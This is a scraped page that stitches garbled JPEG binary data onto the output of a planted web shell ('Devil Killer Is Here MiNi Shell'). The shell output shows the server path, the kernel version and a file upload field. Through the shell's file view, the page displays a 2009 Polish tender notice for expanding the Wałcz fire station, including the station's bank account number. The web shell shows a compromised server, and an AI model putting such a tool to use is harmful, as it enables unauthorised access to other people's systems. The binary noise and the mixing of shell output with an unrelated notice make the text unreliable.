JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/16281-N-2009.html

<p class="kh_header"><b>Wałcz: Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo Gaśniczej w Wałczu przy ul. 12 Lutego 20  etap II</b><br>
<b>Numer ogłoszenia: 16281 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu , ul. 12 Lutego 20, 78-600 Wałcz, woj. zachodniopomorskie, tel. 067 2589471, faks 067 2589471.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo Gaśniczej w Wałczu przy ul. 12 Lutego 20  etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest ,,Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap II (CPV- 45216120-1 Roboty budowlane w zakresie budowy obiektów budowlanych dla służb ratunkowych,  45216121-8 Obiekty Straży Pożarnej).

2.	W celu umożliwienia szczegółowego opisu zakresu robót budowlanych budynek A (administracyjno-garażowy) podzielono na części:
- Część A1, jest to obszar w obrębie części administracyjnej z klatką schodową i projektowaną rozbudową;
- Część A2,  jest to obszar w obrębie garaży i pomieszczeń nad garażami mieszczącymi Jednostkę Ratowniczo-Gaśniczą.
3.	Zakres robót etapu II opisany jest zgodnie z określeniami i podziałem wynikającym z dokumentacji projektowej oraz dodatkowym opisem w rozdziale II podrozdział XVIII ust. 2  i obejmuje:

3.1	 Roboty budowlane w budynku A (CPV-4500000-7)  w zakresie obejmującym:
1/	Wykonanie termoizolacji elewacji ścian zewnętrznych w części A1 i A2;
2/	Przebudowę budynku w części A2;
3/	Wymianę bram garażowych w części A2;
4/	Wykonanie w garażach części A2 posadzki z płytek klinkierowych (ceramicznych) układanych na mokro metodą wibracyjną.
3.2	Roboty budowlane w budynku B (CPV-4520000-9) obejmujące wykonanie budynku garażowo-warsztatowego, parterowego, niepodpiwniczonego z uwzględnieniem zamiennego wykonania posadzki z płytek klinkierowych (ceramicznych) 25mm układanych na mokro metodą wibracyjną we wszystkich pomieszczeniach poza pomieszczeniem WC.

3.3	Budowę osłony śmietnika.

3.4	Roboty instalacyjne wewnętrzne (CPV-45300000-0) :
1/	Instalacja wodno-kanalizacyjna w części A2 z wykonaniem przyłączeń do  instalacji
 wodno-kanalizacyjnej w części A1 wykonywanej w I etapie robót;
2/	Instalacja wodociągowa w części A2 z wykonaniem przyłączeń do instalacji wodociągowej w części A1 wykonywanej w I etapie robót;
3/	Instalacja wodociągowa w budynku B;
4/	Instalacja wodno - kanalizacyjna w budynku B;
5/	Instalacja centralnego ogrzewania w garażach części A2 z przyłączeniem do
instalacji w części A1 wykonywanej w I etapie robót;  
6/	Instalacja na sprężone powietrze w budynku A z przyłączeniem do instalacji
 zasilającej w budynku B;
7/	Instalacja na sprężone powietrze w budynku B;
8/	Instalacja centralnego ogrzewania w budynku B z przyłączeniem do instalacji zasilającej oraz uwzględnieniem montażu grzejników dostarczonych przez inwestora. Grzejniki dostarczone przez inwestora należy wyposażyć w grzejnikowe zawory odcinające, zawory termostatyczne i głowice termostatyczne;
9/	Instalacja gazowa w części A2 z przyłączeniem do instalacji w części A1
wykonywanej w  ramach I etapu robót;
10/	Wykonanie w garażach części A1 i A2 szynowego systemu odsysania spalin oraz kompletne wyposażenie całego systemu w niezbędne urządzenia, a w szczególności wentylacyjne, sterujące i systemy rurowo - zaczepowe przystosowane do układów wydechowych garażowanych samochodów. 
11/	Wentylacja mechaniczna i odsysanie spalin - budynek B;
12/	Wyposażenie zaprojektowanej w części A1 kotłowni gazowej ze wspomaganiem
solarnym w kocioł gazowy centralnego ogrzewania oraz kolektory słoneczne dla
potrzeb grzewczych i ciepłej wody użytkowej wraz z montażem i przyłączeniem do
instalacji wykonywanej w  ramach I etapu robót, oraz wykonanie rozruchu
kotłowni.

3.5	Przebudowa zewnętrznych instalacji zasilających i wod - kan (CPV- 45330000-9)
obejmująca projektowane roboty w niżej przedstawionym zakresie.
1/	Wykonanie zewnętrznej instalacji kanalizacji deszczowej w odcinkach:
- od D11 do D15 i od D14 do D23 wraz z wykonaniem odwodnienia liniowego placu w obrębie projektowanego budynku C i wiaty z dystrybutorem paliw,
- od D10 do D17 wraz z wykonaniem odwodnienia liniowego placu manewrowego,
- od D5 do D9 wraz z wykonaniem odwodnienia liniowego placu wyjazdowego oraz instalacji od D6 do D22 wraz z odwodnieniem liniowym placu manewrowego projektowanego pomiędzy budynkami A i B,
- od D3 do D21 wraz z wykonaniem odprowadzeń wody z połaci dachowej budynku B;
2/	Wykonanie zewnętrznej instalacji kanalizacji sanitarnej w odcinkach od S15 do S20;
3/	Wykonanie zewnętrznej instalacji kanalizacji technologicznej w odcinkach:
- od S10 do S6 wraz z przyłączeniem instalacji z budynku B w odcinkach od S12 do S13  i  S14;
4/	Wykonanie zewnętrznej sieci instalacji wodnej w odcinkach:
- od W6 do W15 z przyłączeniem do instalacji w budynku B,
- od W10 do W 12 zakończonej wykonaniem hydrantu podziemnego;
5/	Przeniesienie hydrantu nadziemnego zgodnie z dokumentacją projektową z
istniejącego punktu HP do nowej lokalizacji w punkcie HP1.

3.6	Instalacje specjalistyczne wewnętrzne i zewnętrzne (CPV - 45300000-0) w zakres których wchodzi :
1/	Kanalizacja teletechniczna-radiowa na odcinku od pomieszczenia serwerowi do
lokalu na 12 piętrze budynku Dolne Miasto 15;
2/	Organizacja ruchu - wykonanie ulicznej sygnalizacji świetlnej;
3/	Instalacje specjalistyczne w budynku A obejmujące:			
a/	Moduł radiokomunikacyjny, w którego zakres wchodzi:
- Przeniesienie istniejących zespołów transmisyjnych z pomieszczenia serwerowni w budynku A do pomieszczenia na 12 piętrze budynku Wałeckiej Spółdzielni Mieszkaniowej - Dolne Miasto 15;
- Wymiana akumulatorów w systemach zdalnego sterowania DZS;
- Wyposażenie  serwerowni w szafę RACK 19  800/ 1000 i wysokości 42U z modułem klimatyzacyjnym, podstawą i drzwiami perforowanymi oraz wyposażoną w trzy półki, dwie listwy zasilające, demontowalne boki. Do szaf RACK w serwerowi należy przenieść urządzenia znajdujące się w serwerowni z uwzględnieniem funkcjonalnego grupowania sprzętowego.
- Wyposażenie pomieszczenia serwerowi w uniwersalny (bazowy) radiotelefon rezerwowy z osprzętem o parametrach co najmniej identycznych ze znajdującymi się w użytkowaniu stanowiska kierowania Komendy Powiatowej PSP w Wałczu, który zapewni łączność w przypadku awarii urządzeń w pomieszczeniu WSM. Radiotelefon należy wyposażyć w antena radiową i przyłączyć do masztu antenowego znajdującego się na budynku strażnicy. Wykonawca uzgodni z Zamawiającym szczegóły sprzętowe podczas wizji lokalnej.
- Centralę radiokomunikacyjną COM-4500 znajdującą się w serwerowni należy rozbudować o kolejne linie (karty łączności) umożliwiające zintegrowanie znajdujących się w użytkowaniu radiotelefonów bazowych.  Wykonawca uzgodni z Zamawiającym szczegóły techniczno - wykonawcze podczas wizji lokalnej.  Centralę radiokomunikacyjną rozbudować o kartę  (urządzenie) modułową umożliwiającą przesyłanie i odbieranie wiadomości tekstowych w systemie łączności ŁDZ.
b/	Moduł telekomunikacyjny obejmuje:
- Wyposażenie w centralę telefoniczną w wersji RACK 19 o parametrach co najmniej równorzędnych do określonych w dokumentacji projektowej.
- Wyposażenie końcowych linii telefonicznych w pomieszczeniach budynku w 16 aparatów telefonicznych,  w tym dwa cyfrowe aparaty systemowe.

c/	Moduł alarmowy i kontroli dostępu obejmujący założenia techniczno - wykonawcze i wyposażenie określone w dokumentacji projektowej, a w szczególności centralę, czytniki i zamki magnetyczne wraz z przyłączeniem do  sieci kablowej wykonanej w I etapie rozbudowy.

d/	Moduł sterowania urządzeniami poprzez panel dotykowy integrujący:
­	Moduł sygnalizacji optycznej i akustycznej o zdarzeniach,
­	Sterowanie sygnalizacją drogową,
­	Sterowanie bramami garażowymi w budynku A i B.
Wszystkie sterowane urządzenia powinny być przystosowane również do zdalnej pracy. Dotykowy panel integrujący należy wbudować na stanowisku dyspozytorskim.

e/	Moduł nagłośnienia pomieszczeń w zakresie wyposażenia w sprzęt i  urządzenia z przyłączeniem do okablowania ułożonego w I etapie realizacji robót.

f/	Moduł obserwacji telewizyjnej w zakresie wyposażenia w urządzenia i przyłączenia do okablowania ułożonego w I etapie realizacji robót.

g/	Moduł infrastruktury technicznej obejmującym wyposażenie w interfejsy umożliwiające połączenie urządzeń znajdujących się na wyposażeniu serwerowi i pomieszczeń PSK.

h/	Moduł zasilania obejmujący wykonanie oddzielnych obwodów elektrycznych umożliwiających zasilanie z UPS urządzeń wymagających podtrzymania zasilania elektrycznego. Zasilaniem z UPS należy objąć urządzenia najbardziej niezbędne dla pracy PSK, w tym zdalne zamykanie i otwieranie bram, sygnalizację akustyczną i optyczną o zdarzeniach, komputery, urządzenia sygnalizacji pożarów, energooszczędne oświetlenie na stanowisku dyspozytora stanowiska kierowania.

i/	Moduł okablowania i sieci komputerowej w zakresie wyposażenia w urządzenia i sprzęt z przyłączeniem do okablowania ułożonego w I etapie realizacji robót. Urządzenia stanowiące wyposażenia obejmują w szczególności szafy krosownicze, switche, pathpanele, gniazda przyłączeniowe.
3.7	Instalacje specjalistyczne w budynku B obejmujące:
1/	Moduł sygnalizacji optycznej i akustycznej o zdarzeniach;
2/	Moduł sterowania urządzeniami w zakresie automatycznego sterowania bramami garażowymi; 
3/	Moduł telewizji dozorowej;
4/	Moduł kontroli dostępu;
5/	Moduł rozgłoszeniowy;
6/	Moduł sieci komputerowej.

3.8	Roboty instalacyjne elektryczne wewnętrzne i zewnętrzne (CPV-45310000-3):
1/	Wykonanie instalacji elektrycznej wewnętrznej obejmującej budynek A, w tym wykonanie rozdzielnicy głównej i podrozdzielnic, instalacji oświetleniowej i zasilającej gniazda i urządzenia odbiorcze w pomieszczeniach oraz instalacji odgromowej i połączeń wyrównawczych;
2/	Wykonanie na granicy działki przyłącza kablowego 0,4kV i szafki pomiarowej z  przyłączeniem położonej w I etapie robót  linii kablowej zewnętrznej i jej przyłączeniem  do rozdzielnicy głównej w budynku A;
3/	Wykonanie WLZ 0,4 kV  i oświetlenia zewnętrznego terenu;
4/	Wykonanie instalacji elektrycznej obejmującej budynek B;
5/	Wykonanie linii kablowej 0,4 kV od rozdzielnicy głównej w budynku A do pomieszczenia nr 7 w istniejącym budynku magazynowym przylegającym do  wschodniej granicy działki i usytuowanym szczytem w odległości 6m od południowej granicy działki;
6/	Położenie linii kablowej do tymczasowej studzienki instalacyjnej przy projektowanym budynku C z zapewnieniem nadwyżki 20m każdego rodzaju prowadzonego przewodu elektrycznego projektowanego do zasilania i opomiarowania budynku C,  dystrybutorów paliw i podziemnego zbiornika paliw.
7/	Wykonanie instalacji ładowania akumulatorów w samochodach.

3.9	Ogrodzenie posesji w zakresie wykonania ogrodzenia indywidualnego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.20-1, 45.21.61.21-8, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 100 000 zł (słownie: sto tysięcy złotych).
2.	Ustala się termin wniesienia wadium lub wpłynięcia na rachunek bankowy Komendy Powiatowej Państwowej Straży Pożarnej w Wałczu do godziny 1530 w dniu  5 lutego 2009 roku.
3.	Wadium może być wniesione: 
1)	w pieniądzu przelewem na rachunek bankowy Komendy Powiatowej Państwowej Straży Pożarnej w Wałczu   Nr  60 1020 2847 00001402 0068 2153
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielonych przez podmioty, o których mowa w art.6b  ust.5 pkt.2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), zdeponowanych w formie oryginału w Komendzie Powiatowej PSP w Wałczu - sekcja ds. finansowych, I piętro, od poniedziałku do piątku w godzinach od 730 do  1530.
4.	Wadium przekazane w formie polecenia przelewu uważa się za zapłacone wtedy,                     gdy wpłynie na rachunek Zamawiającego do godziny 1530 w dniu  5 lutego 2009 roku.
5.	W przypadku złożenia oferty wspólnej wadium w formie innej niż gotówka musi być wystawione na wszystkich partnerów.
6.	Wadium wniesione w poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty o których mowa w art.6b ust. 5 pkt.2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42 poz. 275) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, które zostały określone w art.46  ust.5  ustawy Prawo Zamówień Publicznych.
7.	Z treści wniesionego zabezpieczenia jednoznacznie musi wynikać zobowiązanie gwaranta (banku, zakładu ubezpieczeń, poręczyciela) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaistniały okoliczności o których mowa wyżej, bez jakiejkolwiek potrzeby potwierdzania tych okoliczności.
8.	Termin obowiązywania wniesionego zabezpieczenia nie może być krótszy niż termin związania ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: 
1/	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2/	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wy?konania zamówienia;
3/	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia,
4/	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5/	dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże minimum po jednej osobie posiadającej uprawnienia do kierowania robotami  w specjalności: 
a/	konstrukcyjno-budowlanej,
b/	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
c/	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z Wykonawców ma obowiązek złożyć następujące dokumenty i oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu:
1/Oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1 i art.44  ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ.
2/Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.
3/Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  	
	W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.
4/ Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1  pkt.4 - 8  ustawy Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
	W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców składających ofertę wspólną.
5/ Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 ustawy Prawo Zamówień Publicznych, wystawioną nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 	
		W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.

UWAGA:
	Przedmiotowa informacja winna być wystawiona na podmiot zbiorowy, którym w myśl art.2 ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz.U. Nr 197, poz.661 z  późn. zm.) są osoby prawne (spółki kapitałowe - spółka akcyjna, spółka z o.o.), jednostki organizacyjne nie mające osobowości prawnej (osobowe spółki handlowe - spółka jawna, partnerska, komandytowa i komandytowo - akcyjna), a także spółki handlowe z udziałem Skarbu Państwa, jednostki samorządu terytorialnego lub związki takich jednostek, spółki kapitałowe w organizacji, podmiot w stanie likwidacji oraz przedsiębiorca nie będący osobą fizyczną, a także zagraniczna jednostka organizacyjna. Spółki cywilne nie są podmiotami w rozumieniu ww. ustawy.

6/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
	ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
			W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.

7/ Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ. Do przedmiotowego wykazu należy dołączyć kserokopię uprawnień do sprawowania samodzielnych funkcji w budownictwie oraz zaświadczenie o przynależności do izby inżynierów budownictwa.
	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wskaże kierowników budowy posiadających wykształcenie wyższe oraz odpowiednie uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w stosownym zakresie. 
W przypadku oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób i podmiotów.

8/ Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię o badanym sprawozdaniu,  a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty, zysk oraz zobowiązania i należności za rok 2008.
Zamawiający uzna, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, jeżeli Wykonawca wykaże się przychodem ze sprzedaży towarów i usług za 2008 rok nie niższym niż 1 000 000 zł. (słownie jeden milion złotych).
W przypadku oferty wspólnej ww. dokument składa każdy z Wykonawców przystępujących do oferty wspólnej.
Warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie z tym, że jeden z Wykonawców wykaże się przychodem ze sprzedaży towarów i usług za 2008 rok nie niższym niż  500 000 zł (słownie: pięćset tysięcy złotych).

9/ Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w ust.1 pkt.1 - 12 lub którzy złożyli dokumenty zawierające błędy do uzupełnienia dokumentów lub skorygowania błędów w wyznaczonym przez Zamawiającego terminie, chyba że pomimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczności unieważnienia postępowania. Oświadczenia i dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań na wykonywanie robót budowlanych określonych w ofercie przez Zamawiającego, należy złożyć nie później niż w dniu wyznaczonym przez Zamawiającego jako termin uzupełnienia oświadczeń i dokumentów.
10/ Niespełnienie warunków, o których mowa w ust.1 pkt.1 - 12 bądź nie dołączenie do oferty dokumentów i oświadczeń potwierdzających ich spełnienie lub złożenie dokumentów zawierających błędy, z zastrzeżeniem pkt.13 spowoduje wykluczenie wykonawcy z postępowania.
11/ Ponadto Wykonawcy zobowiązani są dołączyć do oferty następujące dokumenty:
a/	Kosztorysy ofertowe sporządzone w formie szczegółowej z podaniem cen robocizny, materiałów i sprzętu oraz narzutów i cen jednostkowych - opracowane zgodnie z  podrozdziałem XIX. 
W przypadku oferty wspólnej Wykonawcy składają wspólne kosztorysy ofertowe.
b/	Ofertę cenową sporządzoną według FORMULARZA - załącznik nr 1 do SIWZ.
	W przypadku składania oferty wspólnej Wykonawcy składają wspólną ofertę cenową.
c/	Pełnomocnictwo o którym mowa w podrozdziale IV ust.1  SIWZ -  tylko w przypadku oferty wspólnej.
d/	Upoważnienie do podpisania oferty, o którym mowa w podrozdziale II ust.5  SIWZ -  tylko w przypadku gdy nie wynika ono z innych dokumentów załączonych przez Wykonawcę.
12/ Oferty, które nie będą zawierały dokumentów, o których mowa w ust.1 pkt.1 - 12 zostaną odrzucone na podstawie art. 89 ust.1 pkt.2) ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.strazwalcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
ul. 12 Lutego 20
78-600 Wałcz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 10:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
ul. 12 Lutego 20
78-600 Wałcz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com